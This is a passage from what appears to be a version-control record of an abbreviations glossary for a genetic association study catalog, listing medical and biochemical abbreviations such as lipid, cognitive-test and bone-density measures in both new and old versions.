peptide\n\n\nAngCAD: angiographic coronary disease\n\n\nAOI: age of smoking initiation\n\n\napoA-1: apolipoprotein A-1\n\n\naPTT: activated partial thromboplastin time\n\n\nASD: Ostium secundum atrial septal defect\n\n\nAST: aspartate aminotransferase\n\n\nAt: antithrombin\n\n\nATBV: temporal brain volume\n\n\nATCBV: total cerebral brain volume\n\n\nATVB: multivariable-adjusted temporal brain volume\n\n=== B\n\nBABF: baseline brachial artery flow velocity\n\n\nBARS: Barnes Akathisia Scale\n\n\nBD: bipolar disorder\n\n\nBD-RT: bone density estimated by T score at distal radius\n\n\nBD-TT: bone density estimated by T score at midshaft tibia\n\n\nBMD: bone mineral density\n\n\nBMI: body mass index\n\n\nBMR: basal metabolic rate\n\n\nBMR RQ: respiratory quotient during basal metabolic rate measurement\n\n\nBPV: brain parenchymal volume\n\n\nBRCA1\/2: breast cancer 1 gene and breast cancer 2 gene\n\n\nBUA: Broadband ultrasound attenuation\n\n\nBUN: blood urea nitrogen\n\n=== C\n\nC: cholesterol\n\n\nC3: Propionylcarnitine\n\n\nC4: Butyrylcarnitine\n\n\nC9: Nonaylcarnitine\n\n\nC10: Decanoylcarnitine\n\n\nC10:2: Decadienylcarnitine\n\n\nC12: Dodecanoylcarnitine\n\n\nC14:1-OH: Hydroxytetradecenoylcarnitine\n\n\nCA19-9: cancer antigen 19-9\n\n\nCAC: coronary artery calcification\n\n\nCAL:coronary artery lesions\n\n\nCB-PWV: carotid brachial pulse wave velocity\n\n\nCBT: Cortical thickness of the tibia\n\n\nCC16: Clara cell secretory protein\n\n\nCCA: common carotid artery\n\n\nCCA IMT: common carotid artery intimal medial thickness\n\n\nCCT: central corneal thickness\n\n\nCD40L: Ligand, serum & plasma\n\n\ncDAS28: Disease Activity Score\n\n\nCDC: Complicated disease course\n\n\nCE: cholesterol ester\n\n\nCEA: carcinoembryonic antigen\n\n\nCer: ceramide\n\n\nCERAD-dr: Consortium to Establish a Registry for Alzheimer\u2019s Disease delayed recall\n\n\nCEU: CEPH (Centre d'Etude du Polymorphisme Humain) from Utah\n\n\nCF-PWVLTA: carotid-femoral pulse wave velocity, long-term average\n\n\nCHS1: 1st principal component on transformed hue and saturation values\n\n\nCK: creatinine kinase\n\n\nCKD: chronic kidney disease\n\n\ncHAQ: health assessment questionnaire score\n\n\ncHL: Classical Hodgkin lymphoma\n\n\nCIGSTAT: former\/current smokers\n\n\ncIMT: carotid intima media thickness\n\n\nCL: cleft lip without cleft palate\n\n\nCL\/P: cleft lip with or without cleft palate\n\n\nCOWA: total number of correct words across three letters\n\n\nCP: cleft palate\n\n\nCPd: Chronic periodontitis\n\n\nCPD: cigarettes per day\n\n\nCPDBI: 10 or more cigarettes per day\n\n\nCRP: C-reactive protein\n\n\nCRP average 2,6,7: C-reactive protein (CRP) averaged from 3 examinations (over about 20 years)\n\n\nCRP2: C-reactive protein, offspring exam 2\n\n\nCRP average 2,6,7: C-reactive protein average exam 2,6,7\n\n\nCRP6: C-reactive protein exam 6\n\n\nCS: cardioembolic stroke\n\n\ncSJC: Swollen joint count\n\n\ncTJC: Tender joint count\n\n\nCVD: cardiovascular disease\n\n\nCVLT-dr: California Verbal Learning Test delayed recall (belongs to WL-dr category)\n\n=== D\n\nD: particle diameter\n\n\nDBP: diastolic blood pressure\n\n\nDBPLTA: diastolic blood pressure, long-term average\n\n\nD.f.: Dermatophagoides farina\n\n\nDG: Desialylated 2AB-labelled human plasma N-glycans groups\n\n\nDGI+FUSION+WTCCC: combined results from the DGI, FUSION, WTCCC analyses\n\n\nDHEA-S: dehydroisoandrosterone sulfate\n\n\nDI: Disposition index\n\n\nDM: diabetes mellitus\n\n\nD.p.: Dermatophagoides pteronyssinus\n\n\nDWRT-dr: Delayed Word Recall Test (belongs to WL-dr category)\n\n\nDXA: dual energy X-ray absorptiometry\n\n=== E\n\nEA: European Ancestry\n\n\nEBV: Epstein-Barr virus\n\n\nEDS: excessive daytime sleepiness\n\n\nEER: estimated energy requirement\n\n\neGFR: glomerular filtration rate\n\n\neGFRcrea: estimated glomerular filtration rate based on serum creatinine\n\n\neGFRcys: serum cystatin C\n\n\nEIM: Extraintestinal manifestations\n\n\nEM: Elated mania\n\n\nET-1: Endothelin-1\n\n\nESCC: esophageal squamous cell carcinoma\n\n\nESRD: end-stage renal disease\n\n\nESS: Epworth Sleepiness Scale\n\n\nEst-C: esterified cholesterol\n\n\nEVNV: ever smokers, never smokers\n\n=== F\n\nF2: Factor 2 (visual memory and organization)\n\n\nF3: Factor 3 (measure of attention and executive function - Trails A and B)\n\n\nFA: female athletes\n\n\nFC: free cholesterol\n\n\nFEF: forced expiratory flow\n\n\nFEV1: forced expiratory volume in 1 second\n\n\nfev1slope: longitudinal slope of forced expiratory volume in one second\n\n\nFG: fibrinogen\n\n\nFI: fasting insulin\n\n\nFLE: female long endurance athletes\n\n\nFN: femoral neck\n\n\nFNBMDm: femoral bone mineral density in males\n\n\nFPG: fasting plasma glucose\n\n\nfPS: free Protein S\n\n\nFree T3: fasting serum free triiodothyronine\n\n\nFS: female-only stroke\n\n\nFSD: female sexual dysfunction\n\n\nFSG: fasting serum glucose\n\n\nFSH: follicle-stimulating hormone\n\n\nFt3: free thyroxine 3\n\n\nFt4: free thyroxine\n\n\nFUC-A: Antennary fucosylated glycans\n\n\nfuncPS: functional Protein S\n\n\nFVC: forced vital capacity\n\n\nFVII: Coagulation factors VII\n\n\nFWLTA: forward wave amplitude, long-term average\n\n=== G\n\nG3D: grade 3 diarrhea\n\n\nGGT: glutamyltranspeptidase\n\n\nGlc: Glucose\n\n\nGln: Glutamine\n\n\nGLU: glucose\n\n\nGluCer: glucosylceramide\n\n\nGOT (AST): Glutamyl oxaloacetic transaminase, Aspartate aminotransferase\n\n\nGPT (ALT): glutamate pyruvate transaminase, alanine aminotransferase\n\n\nGP130: glycoprotein 130\n\n\nGSE: general side effect burden\n\n=== H\n\nHbA1C: hemoglobin A1c\n\n\nHbF: fetal hemoglobin\n\n\nHcy: homocysteine\n\n\nHDL-C: Total cholesterol in HDL\n\n\nHgb: Hemoglobin\n\n\nHis: Histidine\n\n\nHOMA-IR: homeostasis model insulin resistance\n\n\nHIV: human immunodeficiency virus\n\n\nHDL: high density lipoprotein\n\n\nHOMA-B: beta-cell function\n\n\nHRmax: maximum heart rate during treadmill fitness test\n\n\nHt: hematocrit\n\n\nHU: Hounsfield units\n\n\nHVA: homovanillic acid\n\n\nHVLT-dr: Hopkins Verbal Learning Test delayed recall (belongs to WL-dr category)\n\n=== I\n\nICAIMT: internal cartotid artery internal and common carotid intimal medial thickness\n\n\nICAM: Intercellular adhesion molecule\n\n\nIED: intra-extradimensional set shifting\n\n\nIGF1: insulin-like growth factor I precursor\n\n\nIGFBP-1: fasting serum insulin-like growth factor binding protein-1\n\n\nIGFBP-3: fasting serum insulin-like growth factor binding protein-3\n\n\nIL6: Interleukin-6 precursor\n\n\nIL8: Interleukin-8 precursor\n\n\nIL10: Interleukin-10 precursor\n\n\nIL12: interleukin-12 precursor\n\n\nIL18: Interleukin-18 precursor\n\n\nIL1B: Interleukin-1, beta\n\n\nIL1RA: interleukin-1 receptor antagonist protein precursor\n\n\nIM: irritable mania\n\n\nIMT: Carotid intimal medial thickness\n\n\nINS: insulin\n\n\nint: interaction\n\n\nIR: insulin resistance\n\n\nIS: all ischemic stroke\n\n\nISI_0-120: 0-120 min insulin sensitivity index\n\n=== K\n\nKD: Kawasaki disease\n\n=== L\n\nLA: linoleic acid\n\n\nLAA: large artery atherosclerosis\n\n\nLAD: left atrial diameter\n\n\nLC: lung cancer\n\n\nLDL: low density lipoprotein\n\n\nLDL-C: Total cholesterol in LDL\n\n\nLF\/HF: ratio of low frequency to high frequency power\n\n\nL-LDL-FC: The free cholesterol content of large LDL\n\n\nL-HDL-L: Total lipids in large HDL\n\n\nLS: lumbar spine\n\n\nLTG: lamotrigine-induced hypersensitivity\n\n\nLTL: leukocyte telomere length\n\n\nLVD: large-vessel disease\n\n\nLVDD: left ventricular diastolic diameter\n\n\nLVFS: left ventricular fractional shortening\n\n\nLVM: left ventricular mass\n\n\nLVMI: left ventricular mass index\n\n\nLVSD: left ventricular systolic dimension\n\n\nLYM: Lymphoma subtypes\n\n=== M\n\nM: from clamp\n\n\nMA: male athletes\n\n\nMAP: mean arterial pressure\n\n\nMAPLTA: mean arterial pressure, long-term average\n\n\nmaxL*: maximum L* (reflectance)\n\n\nMC: mother's criticism\n\n\nMCH: mean corpuscular hemoglobin\n\n\nMCHC: mean corpuscular hemoglobin concentra\u00adtion\n\n\nMCI: mild cognitive impairment\n\n\nMCS: Mental Component Summary\n\n\nMCV: mean corpuscular volume\n\n\nMCP1: monocyte chemoattractant protein-1\n\n\nMDC: Mild disease course\n\n\nmeanFVC: mean forced vital capacity from 2 exams\n\n\nmeanratio: mean FEV1\/FVC from 2 exams\n\n\nMETH: Methamphetamine\n\n\nM-HDL-L: Total lipids in medium HDL\n\n\nMHPG: 3-methoxy-4-hydroxyphenlglycol\n\n\nMI: myocardial infarction\n\n\nMIP-1b: macrophage inflammatory protein beta\n\n\nM-LDL-C: Total cholesterol in medium LDL\n\n\nM-LDL-PL: Phospholipids in medium LDL\n\n\nMLE: male long endurance athletes\n\n\nMobCH: double-bond protons of mobile lipids\n\n\nMMnb: mismatch negativity (300-710 ms)\n\n\nMMR: measles, mumps and rubella vaccination\n\n\nMMSE: Mini-mental state examination\n\n\nMSE: middle and short endurance athletes\n\n\nMSSS: Multiple Sclerosis Severity Scale\n\n\nM-VLDL-PL: Phospholipids in medium VLDL\n\n\nMW: mother's warmth\n\n=== N\n\nNA: not applicable\n\n\nNAP: non-albumin protein\n\n\nNam: Boston Naming Test\n\n\nNCI: neurocognitive impairment\n\n\nNeckZ1: Neck section modulus\n\n\nNeckZ1rf: neck section modulus in females\n\n\nNeckW1rf: neck width in females\n\n\nNeckZ1rm: neck section modulus in males\n\n\nNEFA: fasting serum nonesterified fatty acids\n\n\nNFT: neurofibrillary tangles\n\n\nNHL: Non-Hodgkin's Lymphoma\n\n\nNL: neck length\n\n\nNPC: nasopharyngeal carcinoma\n\n\nNPG: normal-pressure glaucoma\n\n\nNR: not reported\n\n\nNS: none significant\n\n\nNSA: neck shaft angle\n\n\nNSAm: neck-shaft angle in males\n\n\nNSCL\/P: nonsyndromic cleft lip with or without cleft palate\n\n\nNW: neck width\n\n\nNvrb: Non Verbal\n\n=== O\n\nOCPD: Childhood Obsessive-Compulsive Personality Disorder\n\n\nOR: odds ratio\n\n=== P\n\nP: particle concentration\n\n\nP3MRSBP: post exercise 3 minute recovery systolic blood pressure\n\n\nPAD: peripheral artery disease\n\n\nPAI-1: plasminogen activator inhibitor\n\n\nPAL: paired associates learning\n\n\nPAR-dr: paragraph delayed recall\n\n\nPC: Protein C\n\n\nPC1: principal component axis 1, CANTAB measures\n\n\nPC2: principal component analysis 2\n\n\nPC3: principal component analysis 3\n\n\nPC aa C36:3: Phosphatidylcholine diacyl C36:3\n\n\nPC aa C36:4: Phosphatidylcholine diacyl C34:4\n\n\nPCS: Physical Component Summary\n\n\nPCV: packed cell volume\n\n\nP gingi: Porphyromonas gingivalis\n\n\nPhe: Phenylalanine\n\n\nPHT: phenytoin-induced hypersensitivity\n\n\nPKYRS: pack-years\n\n\nPL: phospholipid\n\n\nPLT: platelets\n\n\npltadp: platelet aggregation (ADP-induced)\n\n\npltcoll: platelet aggregation (collagen-induced)\n\n\nPP: pulse pressure\n\n\nppfef: percent predicted FEF25-75\u00ad for latest exam\n\n\nppfefrat: percent predicted FEF25-75\u00ad\/FVC for latest exam\n\n\nppfvc: percent predicted FVC for latest exam\n\n\nppfev1: percent predicted FEV1 for latest exam\n\n\nppFEV1\/FEC\/FEE: percent predicted FEV1\/FVC\/FEF\n\n\nppratio: percent predicted FEV1\/FVC for latest exam\n\n\nPRM: pattern recognition memory\n\n\nPROP: propylthiouracil solution\n\n\nPS: protein S\n\n\nPSC: primary sclerosing cholangitis\n\n\nPT: prothrombin time\n\n\nPUFA: polyunsaturated fatty acids\n\n=== Q\n\nQC: quality control\n\n\nQUICKI: fasting serum quantitative insulin sensitivity check index\n\n=== R\n\nRA: Rheumatoid arthritis\n\n\nRANTES: fasting serum regulated upon activation, normal T-cell expressed and secreted\n\n\nRAVLT-dr: Rey\u2019s Auditory Verbal Learning Test delayed recall (belongs to WL-dr category)\n\n\nRBC: red blood cell\n\n\nRBCC: red blood cell count\n\n\nRDW: red cell distribution width\n\n\nRQmax: maximum respiratory quotient during treadmill fitness test\n\n\nRVP: rapid visual processing\n\n\nRW: reflected wave amplitude\n\n\nRWLTA: reflected wave amplitude, long-term average\n\n=== S\n\nS2EHR: Stage 2 exercise heart rate\n\n\nS2ESBP: stage 2 exercise systolic blood pressure\n\n\nserum TG: serum total triglyceride content\n\n\nSAS: Simpson-Angus Scale\n\n\nSBP: systolic blood pressure\n\n\nSBPLTA: systolic blood pressure, long-term average\n\n\nsCR: serum creatinine\n\n\nSCZ and BD: Schizophrenia and Bipolar disorder\n\n\ns.d.: standard deviation\n\n\nSE: sleep efficiency\n\n\nSG: Glucose effectiveness\n\n\nShaftW1: Shaft width combined\n\n\nShaftW1f: shaft width in females\n\n\nShaftZ1rf: shaft section modulus in females\n\n\nShaftZ1R: shaft section modulus\n\n\nSHBG: sex hormone binding globulin\n\n\nSI: SI from FSIGT\n\n\nsICAM-1: fasting serum soluble intercellular adhesion molecule-1\n\n\nsIL-6R: soluble interleukin\n\n\nSim: Similarities\n\n\nSleep RQ: respiratory quotient during sleep\n\n\nSLE: systemic lupus erythematosus\n\n\nSM-1: butyrylcarnitine \/ propionylcarnitine\n\n\nSM-2: N-acetylornithine\n\n\nSM-3: 1-arachidonoylglycero phosphoethanolamine \/ 1-linoleoylglycerophospho-ethanolamine\n\n\nSM-4: bilirubin (E,E) \/ oleoylcarnitine\n\n\nSM-5: hexanoylcarnitine \/ oleate (18:1n9)\n\n\nSM-6: myristate (14:0) \/ myristoleate (14:1n5)\n\n\nSM-7: 1-methylxanthine \/ 4-acetamidobutanoate\n\n\nSM-8: ADpSGEGDFXAEGGGVR \/ ADSGEGDFXAEGGGVR\n\n\n\nSM-9: 10-nonadecenoate (19:1n9) \/ 10-undecenoate (11:1n1)\n\n\nSM-10: eicosenoate (20:1n9 or 11) \/ tetradecanedioate\n\n\nSM-11: ADpSGEGDFXAEGGGVR \/ ADSGEGDFXAEGGGVR\n\n\nSM-12: ADSGEGDFXAEGGGVR \/ DSGEGDFXAEGGGVR\n\n\nSM-13: androsterone sulfate \/ epiandrosterone sulfate\n\n\nSM-14: ADpSGEGDFXAEGGGVR \/ DSGEGDFXAEGGGVR\n\n\nSM-15: 1-eicosatrienoylglycero-phosphocholine \/ 1-linoleoylglycero phosphocholine\n\n\nSM-16: docosahexaenoate (DHA; 22:6n3) \/ eicosapentaenoate (EPA; 20:5n3)\n\n\nSM-17: 3-(4-hydroxyphenyl)lactate \/ isovalerylcarnitine\n\n\nSMKAGE: age of initiation (years)\n\n\nSMKDU: duration (years)\n\n\nSM: sphingomyelin\n\n\nSpc: spectrum\n\n\nSP-D: surfactant protein D\n\n\nSPEED: processing speed\n\n\nSRM: spatial recognition memory\n\n\nSSP: spatial span\n\n\nsTfR: Soluble Transferrin Receptor\n\n\nsTie-2: soluble receptor Tie-2\n\n\nStr: strict\n\n\nSVD: small-vessel disease\n\n\nSWM: spatial working memory\n\n=== T\n\nTAT: Total adipose tissue area\n\n\nTC: total cholesterol\n\n\nTEE: 24-h total energy expenditure\n\n\ntFPG: 28 year time averaged fasting plasma glucose (FPG)\n\n\nTG: triglycerides\n\n\nTGF-b1: transforming growth factor\n\n\nTG\/HDLC: fasting serum triglycerides\/high density lipoprotein cholesterol\n\n\nTIDN: Type 1 diabetes diabetic nephropathy\n\n\nTotal PS: Total Protein S\n\n\nTotal T3: fasting serum triiodothyronine\n\n\nTotal T4: fasting serum thyroxine\n\n\nTP: total protein\n\n\ntPA: tissue plasminogen activator\n\n\nTNFA: tumor necrosis factor alpha\n\n\nTRBMD: Trochanter bone mineral density\n\n\nTRBMDm: Trochanter bone mineral density males\n\n\nTSH: thyroid stimulating hormone\n\n\nTyr: Tyrosine\n\n=== U\n\nUAE: urinary albumin excretion\n\n=== V\n\nVal: Valine\n\n\nvBMD: volumetric bone mineral density\n\n\nVitD250H: Vitamin D plasma 25(OH)-D\n\n\nVitkPhylloq: Vitamin K plasma phylloquinone\n\n\nVLDL: very-low-density lipoprotein\n\n\nVLDL-D: Mean diameter for VLDL particles\n\n\nVO2max: maximum oxygen consumption during treadmill fitness test\n\n\nVOS: velocity of sound\n\n\nVPWL-dr: delayed recall for visually presented word list\n\n\nVrb: verbal\n\n\nVRM: verbal recall\n\n\nvWF: Willebrand factor\n\n=== W\n\nWBC: white blood cell\n\n\nWC: waist circumference\n\n\nWCadjBMI: WC adjustment for BMI\n\n\nWF: weight fluctuation\n\n\nWGHS: Women's Genome Health Study\n\n\nWHR: waist hip ratio\n\n\nWHRadjBMI: WHR adjustment for BMI\n\n\nWL-dr: word list delayed recall\n\n\nWRAT: Wide-Range Achievement Test\n\n=== XYZ\n\nXL-HDL-CE: The cholesterol ester content of extra large HD\n\n\nXL-HDL-TG: Triglycerides in very large HDL\n\n\nXXL-VLDL-P: extremely large VLDL particles\n\n\nYKL-40: (Chitinase 3-like 1) protein levels\n","old_contents":"= Abbreviations\n\n== Full Description of Abbreviations used in the Catalog\n\n<<Special Characters>>, <<A>>, <<B>>, <<C>>, <<D>>, <<E>>, <<F>>, <<G>>, <<H>>, <<I>>, <<K>>, <<L>>, <<M>>, <<N>> ,<<O>>, <<P>>, <<Q>>, <<R>>, <<S>>, <<T>>, <<U>>, <<V>>, <<W>>, <<XYZ>>\n\n=== Special Characters\n\n?: A risk allele not reported\n\n\n5-HIAA: 5-hydroxyindoleacetic acid\n\n=== A\n\nAA: African-American\n\n\nAAM-BR: Age at menarche and buckling ratio\n\n\nAAM-CT: Age at menarche and cortical thickness\n\n\nAAM-W: Age at menarche and periosteal diameter\n\n\nAAT: alanine aminotransferase\n\n\nAAC: abdominal aortic calcium\n\n\nA action: Aggregatibacter actinomycetemcomitans\n\n\nAb: Amyloid-beta\n\n\nABI: ankle brachial index\n\n\nACE: Angiotensin-converting enzyme\n\n\nACPA: antibodies to citrullinated peptide antigens\n\n\nACVn: normalised agkistrodon contortrix venom ratio\n\n\nAD: Alzheimer's Disease\n\n\nADM: Adrenomedullin\n\n\nAF: atrial fibrillation\n\n\nAFBV: Frontal Brain volume\n\n\nAFP: ? fetoprotein\n\n\nAFVB: multivariable-adjusted frontal brain volume\n\n\nAIMS: Abnormal Involuntary Movements Scale\n\n\nAIRg: Acute insulin response\n\n\nAla: Alaine\n\n\nALB: albumin\n\n\nALB\/GLB: serum albumin:globulin ratio\n\n\nALL: all ancestries\n\n\nALL-dr: combined tests of verbal delayed recall\n\n\nALLV: adjusted log lateral ventricular volume\n\n\nALP: alkaline phosphatase\n\n\nAlpha-TOH: alpha-tocopherol\n\n\nALT: alanine aminotransferase\n\n\nALTHBV: multivariable-adjusted temporal horn volume\n\n\nAlkPhos: Alkaline phosphatase\n\n\nAMD: Age-related macular degeneration\n\n\nANP6: N-terminal pro-atrial natriuretic peptide\n\n\nAngCAD: angiographic coronary disease\n\n\nAOI: age of smoking initiation\n\n\napoA-1: apolipoprotein A-1\n\n\naPTT: activated partial thromboplastin time\n\n\nASD: Ostium secundum atrial septal defect\n\n\nAST: aspartate aminotransferase\n\n\nAt: antithrombin\n\n\nATBV: temporal brain volume\n\n\nATCBV: total cerebral brain volume\n\n\nATVB: multivariable-adjusted temporal brain volume\n\n=== B\n\nBABF: baseline brachial artery flow velocity\n\n\nBARS: Barnes Akathisia Scale\n\n\nBD: bipolar disorder\n\n\nBD-RT: bone density estimated by T score at distal radius\n\n\nBD-TT: bone density estimated by T score at midshaft tibia\n\n\nBMD: bone mineral density\n\n\nBMI: body mass index\n\n\nBMR: basal metabolic rate\n\n\nBMR RQ: respiratory quotient during basal metabolic rate measurement\n\n\nBPV: brain parenchymal volume\n\n\nBRCA1\/2: breast cancer 1 gene and breast cancer 2 gene\n\n\nBUA: Broadband ultrasound attenuation\n\n\nBUN: blood urea nitrogen\n\n=== C\n\nC: cholesterol\n\n\nC3: Propionylcarnitine\n\n\nC4: Butyrylcarnitine\n\n\nC9: Nonaylcarnitine\n\n\nC10: Decanoylcarnitine\n\n\nC10:2: Decadienylcarnitine\n\n\nC12: Dodecanoylcarnitine\n\n\nC14:1-OH: Hydroxytetradecenoylcarnitine\n\n\nCA19-9: cancer antigen 19-9\n\n\nCAC: coronary artery calcification\n\n\nCAL:coronary artery lesions\n\n\nCB-PWV: carotid brachial pulse wave velocity\n\n\nCBT: Cortical thickness of the tibia\n\n\nCC16: Clara cell secretory protein\n\n\nCCA: common carotid artery\n\n\nCCA IMT: common carotid artery intimal medial thickness\n\n\nCCT: central corneal thickness\n\n\nCD40L: Ligand, serum & plasma\n\n\ncDAS28: Disease Activity Score\n\n\nCDC: Complicated disease course\n\n\nCE: cholesterol ester\n\n\nCEA: carcinoembryonic antigen\n\n\nCer: ceramide\n\n\nCERAD-dr: Consortium to Establish a Registry for Alzheimer\u2019s Disease delayed recall\n\n\nCEU: CEPH (Centre d'Etude du Polymorphisme Humain) from Utah\n\n\nCF-PWVLTA: carotid-femoral pulse wave velocity, long-term average\n\n\nCHS1: 1st principal component on transformed hue and saturation values\n\n\nCK: creatinine kinase\n\n\nCKD: chronic kidney disease\n\n\ncHAQ: health assessment questionnaire score\n\n\ncHL: Classical Hodgkin lymphoma\n\n\nCIGSTAT: former\/current smokers\n\n\ncIMT: carotid intima media thickness\n\n\nCL: cleft lip without cleft palate\n\n\nCL\/P: cleft lip with or without cleft palate\n\n\nCOWA: total number of correct words across three letters\n\n\nCP: cleft palate\n\n\nCPd: Chronic periodontitis\n\n\nCPD: cigarettes per day\n\n\nCPDBI: 10 or more cigarettes per day\n\n\nCRP: C-reactive protein\n\n\nCRP average 2,6,7: C-reactive protein (CRP) averaged from 3 examinations (over about 20 years)\n\n\nCRP2: C-reactive protein, offspring exam 2\n\n\nCRP average 2,6,7: C-reactive protein average exam 2,6,7\n\n\nCRP6: C-reactive protein exam 6\n\n\nCS: cardioembolic stroke\n\n\ncSJC: Swollen joint count\n\n\ncTJC: Tender joint count\n\n\nCVD: cardiovascular disease\n\n\nCVLT-dr: California Verbal Learning Test delayed recall (belongs to WL-dr category)\n\n=== D\n\nD: particle diameter\n\n\nDBP: diastolic blood pressure\n\n\nDBPLTA: diastolic blood pressure, long-term average\n\n\nD.f.: Dermatophagoides farina\n\n\nDG: Desialylated 2AB-labelled human plasma N-glycans groups\n\n\nDGI+FUSION+WTCCC: combined results from the DGI, FUSION, WTCCC analyses\n\n\nDHEA-S: dehydroisoandrosterone sulfate\n\n\nDI: Disposition index\n\n\nDM: diabetes mellitus\n\n\nD.p.: Dermatophagoides pteronyssinus\n\n\nDWRT-dr: Delayed Word Recall Test (belongs to WL-dr category)\n\n\nDXA: dual energy X-ray absorptiometry\n\n=== E\n\nEA: European Ancestry\n\n\nEBV: Epstein-Barr virus\n\n\nEDS: excessive daytime sleepiness\n\n\nEER: estimated energy requirement\n\n\neGFR: glomerular filtration rate\n\n\neGFRcrea: estimated glomerular filtration rate based on serum creatinine\n\n\neGFRcys: serum cystatin C\n\n\nEIM: Extraintestinal manifestations\n\n\nEM: Elated mania\n\n\nET-1: Endothelin-1\n\n\nESCC: esophageal squamous cell carcinoma\n\n\nESRD: end-stage renal disease\n\n\nESS: Epworth Sleepiness Scale\n\n\nEst-C: esterified cholesterol\n\n\nEVNV: ever smokers, never smokers\n\n=== F\n\nF2: Factor 2 (visual memory and organization)\n\n\nF3: Factor 3 (measure of attention and executive function - Trails A and B)\n\n\nFA: female athletes\n\n\nFC: free cholesterol\n\n\nFEF: forced expiratory flow\n\n\nFEV1: forced expiratory volume in 1 second\n\n\nfev1slope: longitudinal slope of forced expiratory volume in one second\n\n\nFG: fibrinogen\n\n\nFI: fasting insulin\n\n\nFLE: female long endurance athletes\n\n\nFN: femoral neck\n\n\nFNBMDm: femoral bone mineral density in males\n\n\nFPG: fasting plasma glucose\n\n\nfPS: free Protein S\n\n\nFree T3: fasting serum free triiodothyronine\n\n\nFS: female-only stroke\n\n\nFSD: female sexual dysfunction\n\n\nFSG: fasting serum glucose\n\n\nFSH: follicle-stimulating hormone\n\n\nFt3: free thyroxine 3\n\n\nFt4: free thyroxine\n\n\nFUC-A: Antennary fucosylated glycans\n\n\nfuncPS: functional Protein S\n\n\nFVC: forced vital capacity\n\n\nFVII: Coagulation factors VII\n\n\nFWLTA: forward wave amplitude, long-term average\n\n=== G\n\nG3D: grade 3 diarrhea\n\n\nGGT: glutamyltranspeptidase\n\n\nGlc: Glucose\n\n\nGln: Glutamine\n\n\nGLU: glucose\n\n\nGluCer: glucosylceramide\n\n\nGOT (AST): Glutamyl oxaloacetic transaminase, Aspartate aminotransferase\n\n\nGPT (ALT): glutamate pyruvate transaminase, alanine aminotransferase\n\n\nGP130: glycoprotein 130\n\n\nGSE: general side effect burden\n\n=== H\n\nHbA1C: hemoglobin A1c\n\n\nHbF: fetal hemoglobin\n\n\nHcy: homocysteine\n\n\nHDL-C: Total cholesterol in HDL\n\n\nHgb: Hemoglobin\n\n\nHis: Histidine\n\n\nHOMA-IR: homeostasis model insulin resistance\n\n\nHIV: human immunodeficiency virus\n\n\nHDL: high density lipoprotein\n\n\nHOMA-B: beta-cell function\n\n\nHRmax: maximum heart rate during treadmill fitness test\n\n\nHt: hematocrit\n\n\nHU: Hounsfield units\n\n\nHVA: homovanillic acid\n\n\nHVLT-dr: Hopkins Verbal Learning Test delayed recall (belongs to WL-dr category)\n\n=== I\n\nICAIMT: internal cartotid artery internal and common carotid intimal medial thickness\n\n\nICAM: Intercellular adhesion molecule\n\n\nIED: intra-extradimensional set shifting\n\n\nIGF1: insulin-like growth factor I precursor\n\n\nIGFBP-1: fasting serum insulin-like growth factor binding protein-1\n\n\nIGFBP-3: fasting serum insulin-like growth factor binding protein-3\n\n\nIL6: Interleukin-6 precursor\n\n\nIL8: Interleukin-8 precursor\n\n\nIL10: Interleukin-10 precursor\n\n\nIL12: interleukin-12 precursor\n\n\nIL18: Interleukin-18 precursor\n\n\nIL1B: Interleukin-1, beta\n\n\nIL1RA: interleukin-1 receptor antagonist protein precursor\n\n\nIM: irritable mania\n\n\nIMT: Carotid intimal medial thickness\n\n\nINS: insulin\n\n\nint: interaction\n\n\nIR: insulin resistance\n\n\nIS: all ischemic stroke\n\n\nISI_0-120: 0-120 min insulin sensitivity index\n\n=== K\n\nKD: Kawasaki disease\n\n=== L\n\nLA: linoleic acid\n\n\nLAA: large artery atherosclerosis\n\n\nLAD: left atrial diameter\n\n\nLC: lung cancer\n\n\nLDL: low density lipoprotein\n\n\nLDL-C: Total cholesterol in LDL\n\n\nLF\/HF: ratio of low frequency to high frequency power\n\n\nL-LDL-FC: The free cholesterol content of large LDL\n\n\nL-HDL-L: Total lipids in large HDL\n\n\nLS: lumbar spine\n\n\nLTG: lamotrigine-induced hypersensitivity\n\n\nLTL: leukocyte telomere length\n\n\nLVD: large-vessel disease\n\n\nLVDD: left ventricular diastolic diameter\n\n\nLVFS: left ventricular fractional shortening\n\n\nLVM: left ventricular mass\n\n\nLVMI: left ventricular mass index\n\n\nLVSD: left ventricular systolic dimension\n\n\nLYM: Lymphoma subtypes\n\n=== M\n\nM: from clamp\n\n\nMA: male athletes\n\n\nMAP: mean arterial pressure\n\n\nMAPLTA: mean arterial pressure, long-term average\n\n\nmaxL*: maximum L* (reflectance)\n\n\nMC: mother's criticism\n\n\nMCH: mean corpuscular hemoglobin\n\n\nMCHC: mean corpuscular hemoglobin concentra\u00adtion\n\n\nMCI: mild cognitive impairment\n\n\nMCS: Mental Component Summary\n\n\nMCV: mean corpuscular volume\n\n\nMCP1: monocyte chemoattractant protein-1\n\n\nMDC: Mild disease course\n\n\nmeanFVC: mean forced vital capacity from 2 exams\n\n\nmeanratio: mean FEV1\/FVC from 2 exams\n\n\nMETH: Methamphetamine\n\n\nM-HDL-L: Total lipids in medium HDL\n\n\nMHPG: 3-methoxy-4-hydroxyphenlglycol\n\n\nMI: myocardial infarction\n\n\nMIP-1b: macrophage inflammatory protein beta\n\n\nM-LDL-C: Total cholesterol in medium LDL\n\n\nM-LDL-PL: Phospholipids in medium LDL\n\n\nMLE: male long endurance athletes\n\n\nMobCH: double-bond protons of mobile lipids\n\n\nMMnb: mismatch negativity (300-710 ms)\n\n\nMMR: measles, mumps and rubella vaccination\n\n\nMMSE: Mini-mental state examination\n\n\nMSE: middle and short endurance athletes\n\n\nMSSS: Multiple Sclerosis Severity Scale\n\n\nM-VLDL-PL: Phospholipids in medium VLDL\n\n\nMW: mother's warmth\n\n=== N\n\nNA: not applicable\n\n\nNAP: non-albumin protein\n\n\nNam: Boston Naming Test\n\n\nNCI: neurocognitive impairment\n\n\nNeckZ1: Neck section modulus\n\n\nNeckZ1rf: neck section modulus in females\n\n\nNeckW1rf: neck width in females\n\n\nNeckZ1rm: neck section modulus in males\n\n\nNEFA: fasting serum nonesterified fatty acids\n\n\nNFT: neurofibrillary tangles\n\n\nNHL: Non-Hodgkin's Lymphoma\n\n\nNL: neck length\n\n\nNPC: nasopharyngeal carcinoma\n\n\nNPG: normal-pressure glaucoma\n\n\nNR: not reported\n\n\nNS: none significant\n\n\nNSA: neck shaft angle\n\n\nNSAm: neck-shaft angle in males\n\n\nNSCL\/P: nonsyndromic cleft lip with or without cleft palate\n\n\nNW: neck width\n\n\nNvrb: Non Verbal\n\n=== 